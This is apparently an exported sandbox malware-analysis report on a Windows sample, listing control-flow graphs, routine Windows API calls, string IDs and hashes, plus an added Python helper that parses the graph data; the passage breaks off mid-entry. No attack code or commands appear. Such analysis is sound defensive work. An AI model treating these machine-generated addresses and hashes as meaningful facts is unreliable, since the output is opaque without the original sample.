                                                                  execution_graph 27188 d0acf0 27192 d0ade8 27188->27192 27197 d0add9 27188->27197 27189 d0acff 27193 d0ae1c 27192->27193 27194 d0adf9 27192->27194 27193->27189 27194->27193 27195 d0b020 GetModuleHandleW 27194->27195 27196 d0b04d 27195->27196 27196->27189 27198 d0adf9 27197->27198 27199 d0ae1c 27197->27199 27198->27199 27200 d0b020 GetModuleHandleW 27198->27200 27199->27189 27201 d0b04d 27200->27201 27201->27189 27212 d0d6c0 DuplicateHandle 27213 d0d756 27212->27213 27202 d0d478 27203 d0d4be GetCurrentProcess 27202->27203 27205 d0d510 GetCurrentThread 27203->27205 27208 d0d509 27203->27208 27206 d0d546 27205->27206 27207 d0d54d GetCurrentProcess 27205->27207 27206->27207 27211 d0d583 27207->27211 27208->27205 27209 d0d5ab GetCurrentThreadId 27210 d0d5dc 27209->27210 27211->27209 27214 d04668 27215 d0467a 27214->27215 27216 d04686 27215->27216 27218 d04779 27215->27218 27219 d0479d 27218->27219 27223 d04888 27219->27223 27227 d04879 27219->27227 27225 d048af 27223->27225 27224 d0498c 27224->27224 27225->27224 27231 d044d4 27225->27231 27229 d04888 27227->27229 27228 d0498c 27228->27228 27229->27228 27230 d044d4 CreateActCtxA 27229->27230 27230->27228 27232 d05918 CreateActCtxA 27231->27232 27234 d059db 27232->27234

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 294 d0d468-d0d507 GetCurrentProcess 298 d0d510-d0d544 GetCurrentThread 294->298 299 d0d509-d0d50f 294->299 300 d0d546-d0d54c 298->300 301 d0d54d-d0d581 GetCurrentProcess 298->301 299->298 300->301 303 d0d583-d0d589 301->303 304 d0d58a-d0d5a5 call d0d647 301->304 303->304 306 d0d5ab-d0d5da GetCurrentThreadId 304->306 308 d0d5e3-d0d645 306->308 309 d0d5dc-d0d5e2 306->309 309->308
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 00D0D4F6
                                                                  • GetCurrentThread.KERNEL32 ref: 00D0D533
                                                                  • GetCurrentProcess.KERNEL32 ref: 00D0D570
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D0D5C9
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2224413292.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_d00000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: 6e1774f5d7ed346e64ba4046c81a5c2acd9b671c6e8c5272cb1c2e4e086a5918
                                                                  • Instruction ID: 6cd65a1046ad53632973b73fdd8d939e95f7ed8a7d7ab7cebb8d5482ff8b1299
                                                                  • Opcode Fuzzy Hash: 6e1774f5d7ed346e64ba4046c81a5c2acd9b671c6e8c5272cb1c2e4e086a5918
                                                                  • Instruction Fuzzy Hash: CD518AB09016098FDB14DFA9D9487AEBBF1FF49304F248459D409A73A0C7789944CF65

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 316 d0d478-d0d507 GetCurrentProcess 320 d0d510-d0d544 GetCurrentThread 316->320 321 d0d509-d0d50f 316->321 322 d0d546-d0d54c 320->322 323 d0d54d-d0d581 GetCurrentProcess 320->323 321->320 322->323 325 d0d583-d0d589 323->325 326 d0d58a-d0d5a5 call d0d647 323->326 325->326 328 d0d5ab-d0d5da GetCurrentThreadId 326->328 330 d0d5e3-d0d645 328->330 331 d0d5dc-d0d5e2 328->331 331->330
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 00D0D4F6
                                                                  • GetCurrentThread.KERNEL32 ref: 00D0D533
                                                                  • GetCurrentProcess.KERNEL32 ref: 00D0D570
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D0D5C9
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2224413292.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_d00000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: cee1a38c29851da9d1c14da273be6234438c8787e019c48dac14297b2eae52dc
                                                                  • Instruction ID: 796cc972378780c716982a13a76548945f9b475cb7b3d1d61e81e109ebe7e704
                                                                  • Opcode Fuzzy Hash: cee1a38c29851da9d1c14da273be6234438c8787e019c48dac14297b2eae52dc
                                                                  • Instruction Fuzzy Hash: 6A5179B09017098FDB14DFA9D948B9EBBF1FF89314F208459E409A73A0D7789984CF65

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 360 4ce79e0-4ce7aca 363 4ce7ad6-4ce7ae2 360->363 382 4ce7ae5 call 4ce8620 363->382 383 4ce7ae5 call 4ce8611 363->383 364 4ce7aeb-4ce7b04 368 4ce7b66-4ce7c4b call 4ce6584 call 4ce56c8 call 4ce6594 364->368 369 4ce7b06-4ce7b5e 364->369 369->368 382->364 383->364
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2229102468.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_4ce0000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $
                                                                  • API String ID: 0-227171996
                                                                  • Opcode ID: 8569b175186dca47ac55175c36a3f4512a082ac767cb8a514692dd7fc5b1d167
                                                                  • Instruction ID: 9edd6dedbd99ddafbdfe2d5717daffbf302d7e2595820442dbf99bd2ddfc309a
                                                                  • Opcode Fuzzy Hash: 8569b175186dca47ac55175c36a3f4512a082ac767cb8a514692dd7fc5b1d167
                                                                  • Instruction Fuzzy Hash: 0E71F230D10701CFDB41EF29D480964B7F5FF85304B518AA8D959AB31AEB31F898CB80

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 384 4ce6554-4ce7ae2 408 4ce7ae5 call 4ce8620 384->408 409 4ce7ae5 call 4ce8611 384->409 390 4ce7aeb-4ce7b04 394 4ce7b66-4ce7c4b call 4ce6584 call 4ce56c8 call 4ce6594 390->394 395 4ce7b06-4ce7b5e 390->395 395->394 408->390 409->390
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2229102468.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_4ce0000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $
                                                                  • API String ID: 0-227171996
                                                                  • Opcode ID: 26e9ab80ec2a2332153c7bc16159963abf56526107f310052c5a780c2c48b1dc
                                                                  • Instruction ID: 8e5cc6a0dda5b1e5f4b8c2a7320c08b2d1498cb8b173648e9db0a394c4c0902d
                                                                  • Opcode Fuzzy Hash: 26e9ab80ec2a2332153c7bc16159963abf56526107f310052c5a780c2c48b1dc
                                                                  • Instruction Fuzzy Hash: D461C330D10701CFDB40EF29D484965B7F9FF85304B518AA8DA59AB31AEB71F898CB80

                                                                   Control-flow graph (interactive rendering not reproduced; raw node/edge list as exported follows)
                                                                  control_flow_graph 410 d0ade8-d0adf7 411 d0ae23-d0ae27 410->411 412 d0adf9-d0ae06 call d09414 410->412 413 d0ae29-d0ae33 411->413 414 d0ae3b-d0ae7c 411->414 419 d0ae08 412->419 420 d0ae1c 412->420 413->414 421 d0ae89-d0ae97 414->421 422 d0ae7e-d0ae86 414->422 465 d0ae0e call d0b080 419->465 466 d0ae0e call d0b070 419->466 420->411 424 d0ae99-d0ae9e 421->424 425 d0aebb-d0aebd 421->425 422->421 423 d0ae14-d0ae16 423->420 426 d0af58-d0b018 423->426 428 d0aea0-d0aea7 call d0a150 424->428 429 d0aea9 424->429 427 d0aec0-d0aec7 425->427 460 d0b020-d0b04b GetModuleHandleW 426->460 461 d0b01a-d0b01d 426->461 430 d0aed4-d0aedb 427->430 431 d0aec9-d0aed1 427->431 432 d0aeab-d0aeb9 428->432 429->432 435 d0aee8-d0aef1 call d0a160 430->435 436 d0aedd-d0aee5 430->436 431->430 432->427 441 d0aef3-d0aefb 435->441 442 d0aefe-d0af03 435->442 436->435 441->442 444 d0af21-d0af2e 442->444 445 d0af05-d0af0c 442->445 450 d0af30-d0af4e 444->450 451 d0af51-d0af57 444->451 445->444 446 d0af0e-d0af1e call d0a170 call d0a180 445->446 446->444 450->451 462 d0b054-d0b068 460->462 463 d0b04d-d0b053 460->463 461->460 463->462 465->423 466->423
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00D0B03E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2224413292.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_d00000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: f097e1e1391d1910fe62e13228a5dd4689e948d67cbcadccf560b94ca33cd4bf
                                                                  • Instruction ID: ec611f9f6bc2294909c2b34c785b5b1206a57719b8a31870fe9f27ccb6532edd
                                                                  • Opcode Fuzzy Hash: f097e1e1391d1910fe62e13228a5dd4689e948d67cbcadccf560b94ca33cd4bf
                                                                  • Instruction Fuzzy Hash: 16713470A00B058FD724DF69D45579ABBF5FF88300F048A2DE48AD7A90D775E84ACBA1

                                                                   Control-flow graph (interactive rendering not reproduced; raw node/edge list as exported follows)
                                                                  control_flow_graph 467 d0590c-d05916 468 d05918-d059d9 CreateActCtxA 467->468 470 d059e2-d05a3c 468->470 471 d059db-d059e1 468->471 478 d05a4b-d05a4f 470->478 479 d05a3e-d05a41 470->479 471->470 480 d05a60 478->480 481 d05a51-d05a5d 478->481 479->478 483 d05a61 480->483 481->480 483->483
                                                                  APIs
                                                                  • CreateActCtxA.KERNEL32(?), ref: 00D059C9
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2224413292.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_d00000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID: Create
                                                                  • String ID:
                                                                  • API String ID: 2289755597-0
                                                                  • Opcode ID: de4d1df76556dcdbb51e9124d414fac6f79cd921d9aa321aa2bbf3d39bcffc40
                                                                  • Instruction ID: 64dcd1da45d9d1ac5e01f31712be5be3c079f908136879fd32d8cbf42e747318
                                                                  • Opcode Fuzzy Hash: de4d1df76556dcdbb51e9124d414fac6f79cd921d9aa321aa2bbf3d39bcffc40
                                                                  • Instruction Fuzzy Hash: 764114B1C00719CFDB24CFA9C885B8EBBF5BF49304F20815AD418AB255DB75694ACFA0

                                                                   Control-flow graph (interactive rendering not reproduced; raw node/edge list as exported follows)
                                                                  control_flow_graph 484 d044d4-d059d9 CreateActCtxA 487 d059e2-d05a3c 484->487 488 d059db-d059e1 484->488 495 d05a4b-d05a4f 487->495 496 d05a3e-d05a41 487->496 488->487 497 d05a60 495->497 498 d05a51-d05a5d 495->498 496->495 500 d05a61 497->500 498->497 500->500
                                                                  APIs
                                                                  • CreateActCtxA.KERNEL32(?), ref: 00D059C9
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2224413292.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_d00000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID: Create
                                                                  • String ID:
                                                                  • API String ID: 2289755597-0
                                                                  • Opcode ID: 824a227eaea9981a336bff0a5a1932feb6230b514e2df95d77826ca53f0e305f
                                                                  • Instruction ID: ce956644ced77df49d9b7414a65de7c0ee80a4ec96ad361656f43cae9689cd40
                                                                  • Opcode Fuzzy Hash: 824a227eaea9981a336bff0a5a1932feb6230b514e2df95d77826ca53f0e305f
                                                                  • Instruction Fuzzy Hash: AD41F3B0D0071DCBDB24CFA9D844B9EBBF5BF48304F20805AD418AB295DB75694ACFA0

                                                                   Control-flow graph (interactive rendering not reproduced; raw node/edge list as exported follows)
                                                                  control_flow_graph 501 d0d6b8-d0d754 DuplicateHandle 502 d0d756-d0d75c 501->502 503 d0d75d-d0d77a 501->503 502->503
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D0D747
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2224413292.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_d00000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: 6279bc4ce9fe00bece264c1a20dc72bb90c207024357e544f0b23b838d3a8696
                                                                  • Instruction ID: 306860f7063081a71a8fd0180eaf5937a194433c6bc83210565aacaa3e961e70
                                                                  • Opcode Fuzzy Hash: 6279bc4ce9fe00bece264c1a20dc72bb90c207024357e544f0b23b838d3a8696
                                                                  • Instruction Fuzzy Hash: 712103B59002489FDB10CFAAD584AEEBFF5FB48324F14845AE958A3351C378A945CF60

                                                                   Control-flow graph (interactive rendering not reproduced; raw node/edge list as exported follows)
                                                                  control_flow_graph 506 d0d6c0-d0d754 DuplicateHandle 507 d0d756-d0d75c 506->507 508 d0d75d-d0d77a 506->508 507->508
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D0D747
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2224413292.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_d00000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: cccff55cb2a8e32263d0a9541ab2de4a186be13ae1def33f7b5666563f26fe05
                                                                  • Instruction ID: 4d77a36d2ac2a883389a399aa80517aaf8b381dab38c0a510dc9942c875b77ad
                                                                  • Opcode Fuzzy Hash: cccff55cb2a8e32263d0a9541ab2de4a186be13ae1def33f7b5666563f26fe05
                                                                  • Instruction Fuzzy Hash: 7221C2B59002489FDB10CFAAD984ADEBBF9FB48310F14841AE918A3350D378A944CFA5

                                                                   Control-flow graph (interactive rendering not reproduced; raw node/edge list as exported follows)
                                                                  control_flow_graph 511 d0afd8-d0b018 512 d0b020-d0b04b GetModuleHandleW 511->512 513 d0b01a-d0b01d 511->513 514 d0b054-d0b068 512->514 515 d0b04d-d0b053 512->515 513->512 515->514
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00D0B03E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2224413292.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_d00000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: e054ac17451d538bebb2d86c8fd83e2658144dcf0e16355518825f5db8149fe3
                                                                  • Instruction ID: 154b349c5d3b7bea79b0ff2b142f484026f2aae499c030c32f3d8f3b0ac5991b
                                                                  • Opcode Fuzzy Hash: e054ac17451d538bebb2d86c8fd83e2658144dcf0e16355518825f5db8149fe3
                                                                  • Instruction Fuzzy Hash: 49110FB5C002498FCB10CF9AD444BDFFBF4AB89324F14841AD528B7240D379A545CFA1
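The `control_flow_graph` lines in this listing are the exported node/edge data behind the interactive graphs: each node is `<id> <start>[-<end>]` followed by zero or more `call <addr>` targets or named Win32 APIs, and edges are `<id>-><id>`. The following Python is an added example, not part of the Joe Sandbox report: it parses that token stream and answers the question an analyst usually has when triaging such a function, which basic blocks can reach the block that invokes a given API. The grammar is inferred from the lines on this page only, and the sample graphs are copied from the GetModuleHandleW and DuplicateHandle functions above.

```python
# Added example (not Joe Sandbox code): parse a 'control_flow_graph' listing and
# compute reverse reachability to the block that calls a given API.
import re
from collections import defaultdict, deque
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
RANGE_RE = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")


@dataclass
class Block:
    start: int
    end: int
    calls: List[int] = field(default_factory=list)   # 'call <addr>' targets in the block
    apis: List[str] = field(default_factory=list)    # named Win32 APIs called from the block


def parse_cfg(line: str) -> Tuple[Dict[int, Block], List[Tuple[int, int]]]:
    """Grammar inferred from the listing: node-id range [call addr | ApiName]* and id->id edges."""
    toks = line.split()
    if not toks or toks[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph line")
    nodes: Dict[int, Block] = {}
    edges: List[Tuple[int, int]] = []
    i = 1
    while i < len(toks):
        m = EDGE_RE.match(toks[i])
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        if not toks[i].isdigit() or i + 1 >= len(toks) or not RANGE_RE.match(toks[i + 1]):
            raise ValueError(f"unexpected token {toks[i]!r} at position {i}")
        nid = int(toks[i])
        start, _, end = toks[i + 1].partition("-")
        blk = Block(int(start, 16), int(end or start, 16))
        i += 2
        while i < len(toks):                 # annotations until the next node id or edge
            t = toks[i]
            if t == "call":
                blk.calls.append(int(toks[i + 1], 16))
                i += 2
            elif t.isdigit() or EDGE_RE.match(t):
                break
            else:
                blk.apis.append(t)
                i += 1
        nodes[nid] = blk
    return nodes, edges


def blocks_reaching_api(nodes: Dict[int, Block], edges: List[Tuple[int, int]], api: str) -> Set[int]:
    """Node ids from which a block calling `api` is reachable (reverse BFS over the edges)."""
    preds: Dict[int, List[int]] = defaultdict(list)
    for src, dst in edges:
        preds[dst].append(src)
    seen: Set[int] = {n for n, b in nodes.items() if api in b.apis}
    queue = deque(seen)
    while queue:
        for p in preds[queue.popleft()]:
            if p not in seen:
                seen.add(p)
                queue.append(p)
    return seen


def summarize(line: str) -> dict:
    nodes, edges = parse_cfg(line)
    return {
        "entry": f"{min(b.start for b in nodes.values()):x}",
        "blocks": len(nodes), "edges": len(edges),
        "apis": sorted({a for b in nodes.values() for a in b.apis}),
        "calls": sorted({f"{c:x}" for b in nodes.values() for c in b.calls}),
    }


# Graph lines copied from this report's listing.
GETMODULEHANDLE_CFG = ("control_flow_graph 511 d0afd8-d0b018 512 d0b020-d0b04b GetModuleHandleW 511->512 "
                       "513 d0b01a-d0b01d 511->513 514 d0b054-d0b068 512->514 515 d0b04d-d0b053 512->515 "
                       "513->512 515->514")
DUPLICATEHANDLE_CFG = ("control_flow_graph 501 d0d6b8-d0d754 DuplicateHandle 502 d0d756-d0d75c 501->502 "
                       "503 d0d75d-d0d77a 501->503 502->503")

if __name__ == "__main__":
    for cfg in (GETMODULEHANDLE_CFG, DUPLICATEHANDLE_CFG):
        nodes, edges = parse_cfg(cfg)
        api = summarize(cfg)["apis"][0]
        print(summarize(cfg), api, sorted(blocks_reaching_api(nodes, edges, api)))
```

For the GetModuleHandleW function the API sits in node 512, and only nodes 511, 512 and 513 can reach it; nodes 514 and 515 are the post-call tail, so a breakpoint on the API is only useful on the 511/513 paths.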

                                                                   Control-flow graph (interactive rendering not reproduced; raw node/edge list as exported follows)
                                                                  control_flow_graph 517 4ced16f-4ced278 call 4ced130 521 4ced27e-4ced285 517->521 522 4ced4e4-4ced4eb 517->522 523 4ced29e-4ced2a5 521->523 524 4ced287-4ced29c 521->524 525 4ced2a7-4ced2b8 523->525 526 4ced2c1-4ced2c8 523->526 524->526 527 4ced2bd-4ced2bf 525->527 528 4ced2ba 525->528 529 4ced2ca-4ced2e0 526->529 530 4ced2e2-4ced2e9 526->530 527->526 528->527 531 4ced313-4ced317 529->531 532 4ced2eb-4ced2f6 530->532 533 4ced2f8-4ced309 530->533 536 4ced33e-4ced345 531->536 537 4ced319-4ced320 531->537 532->531 534 4ced30e-4ced310 533->534 535 4ced30b 533->535 534->531 535->534 538 4ced35b-4ced362 536->538 539 4ced347-4ced34b 536->539 540 4ced329-4ced32d 537->540 541 4ced322 537->541 544 4ced45f-4ced4a6 538->544 545 4ced368-4ced36f 538->545 542 4ced3bf-4ced40a 539->542 543 4ced34d-4ced354 539->543 547 4ced376-4ced3ba 540->547 549 4ced32f-4ced333 540->549 541->540 541->542 546 4ced40f-4ced45d 541->546 541->547 548 4ced4c0-4ced4de 541->548 542->548 543->547 550 4ced356 543->550 544->548 545->542 551 4ced371 545->551 546->548 547->548 548->522 552 4ced4a8-4ced4bb 549->552 553 4ced339 549->553 550->548 551->548 552->548 553->548
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2229102468.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_4ce0000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: aad30d8dfdcb3ca259a9eea3ab78967647ccb546d9f9cecdf4538644986d2f6f
                                                                  • Instruction ID: 7ceaf1761ad0c2587e700cab67db69e974c69c615b3ec3347b6201aaad4b36f0
                                                                  • Opcode Fuzzy Hash: aad30d8dfdcb3ca259a9eea3ab78967647ccb546d9f9cecdf4538644986d2f6f
                                                                  • Instruction Fuzzy Hash: AED1FB3590020ACFCF05DFA8C4949EDB7B2FF58314B258655D806A7259E734BE9ACF80

                                                                   Control-flow graph (interactive rendering not reproduced; raw node/edge list as exported follows)
                                                                  control_flow_graph 573 4ce05d0-4ce05e5 574 4ce05ed-4ce05ef 573->574 575 4ce060d-4ce0633 574->575 576 4ce05f1-4ce060c call 4ce0064 574->576 583 4ce063a-4ce068c 575->583 584 4ce0635-4ce0639 575->584 589 4ce0691-4ce06a8 call 4ce0074 583->589 593 4ce06aa-4ce06ae 589->593 594 4ce06b7-4ce06bf 589->594 595 4ce06c6-4ce06dd 593->595 596 4ce06b0-4ce06b6 593->596 594->595 595->589 600 4ce06df 595->600
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2229102468.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_4ce0000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (aq
                                                                  • API String ID: 0-600464949
                                                                  • Opcode ID: 0ead59856f2bac9c5387f7f7604964fae7090bd4eab167e7b00be7dcdd9a6c9e
                                                                  • Instruction ID: 609babb2ce9f0ec9df97f2667e5f0805a352397f091f35428df4afad471f98ed
                                                                  • Opcode Fuzzy Hash: 0ead59856f2bac9c5387f7f7604964fae7090bd4eab167e7b00be7dcdd9a6c9e
                                                                  • Instruction Fuzzy Hash: 6E214731B082448FD7199F7A94182AF7FEBDBC1214F1084BAD405CB681DE34ED0287A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2229102468.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_4ce0000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q
                                                                  • API String ID: 0-1259897404
                                                                  • Opcode ID: cf1d2e44b155c4d670853ff9eaa588fd75ed0915b3ed1d73b97f0e1ab06420d3
                                                                  • Instruction ID: 6112ef5b498d2eb331fd2dd9e0bdaac5d96a6bee7e3c39245973ef89245f6c23
                                                                  • Opcode Fuzzy Hash: cf1d2e44b155c4d670853ff9eaa588fd75ed0915b3ed1d73b97f0e1ab06420d3
                                                                  • Instruction Fuzzy Hash: 2E21B370D40205DFCB05EFB8D9509AE7BBAEF80300F004565D105AB169DF38AA49CFA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2229102468.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_4ce0000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q
                                                                  • API String ID: 0-1259897404
                                                                  • Opcode ID: 06523ea5142154e758d57f8935ef67f0a3b5c27d2d0be14866e03a270dd2558e
                                                                  • Instruction ID: 80a9618dd1836704bf6cac72bf69be64897a4a8d438821036d8bdc5b48491363
                                                                  • Opcode Fuzzy Hash: 06523ea5142154e758d57f8935ef67f0a3b5c27d2d0be14866e03a270dd2558e
                                                                  • Instruction Fuzzy Hash: F8119070E401099FCB05EFB9E9519EE7BBAEF84700F004565D1056B269EF38AE49CBA1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2229102468.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_4ce0000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 241f819cfc080e9a144de15e239b0606ad522a536ee3ef40db3f54c960415bee
                                                                  • Instruction ID: 9df8d147b6604641f9b72df89accca3b5710961ff81d46b6abae4d06e29721fa
                                                                  • Opcode Fuzzy Hash: 241f819cfc080e9a144de15e239b0606ad522a536ee3ef40db3f54c960415bee
                                                                  • Instruction Fuzzy Hash: A3725F31D00609CFDB15EF68C855AEDB7B1FF45314F008699D54AAB265EB30AAC9CF81
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2229102468.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_4ce0000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ae62c13d8851b27d82380ee47b5cacc9e2a6a7318dcd5bab35c4909163da1fa4
                                                                  • Instruction ID: 796556b65f95b0210f00fc774503818d957e3be25e8a40120bf38c0117068c20
                                                                  • Opcode Fuzzy Hash: ae62c13d8851b27d82380ee47b5cacc9e2a6a7318dcd5bab35c4909163da1fa4
                                                                  • Instruction Fuzzy Hash: 6542D631E106198FDB14DF69C8846EDF7B2FF89304F1586A9D459BB221EB31AA85CF40
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2229102468.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_4ce0000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 084ed10853692e82921de15b71533ea4d01382aa09fd114a7563272657c053fc
                                                                  • Instruction ID: 0b70ff0dd3d7b3dc591cdaeb0f6b123a41a5fa8c7d8c55382680868c82ed9260
                                                                  • Opcode Fuzzy Hash: 084ed10853692e82921de15b71533ea4d01382aa09fd114a7563272657c053fc
                                                                  • Instruction Fuzzy Hash: 7D223834A10615CFDB14DF6AC884AACB7B2FF89304F1485A9E50AAB365EB31AD45CF50
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2229102468.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_4ce0000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a091adccd5b474eb2be8a8e79068330a9b60b1c9636fd8913ab9c22fc3650e7a
                                                                  • Instruction ID: 4a23622827bdae894d24dc022844f535aaf0b2f2427a3439481ee68fb2e22296
                                                                  • Opcode Fuzzy Hash: a091adccd5b474eb2be8a8e79068330a9b60b1c9636fd8913ab9c22fc3650e7a
                                                                  • Instruction Fuzzy Hash: 75122D31D006098FDB55EF28C8956EDB7B2EF44314F004699D94AA7265EF30AEDACF81
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2229102468.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_4ce0000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5b0465d2f6a268d98ceb3661790178b3ab8ed6db5f92eb3f8b6c792a5a3ddaa2
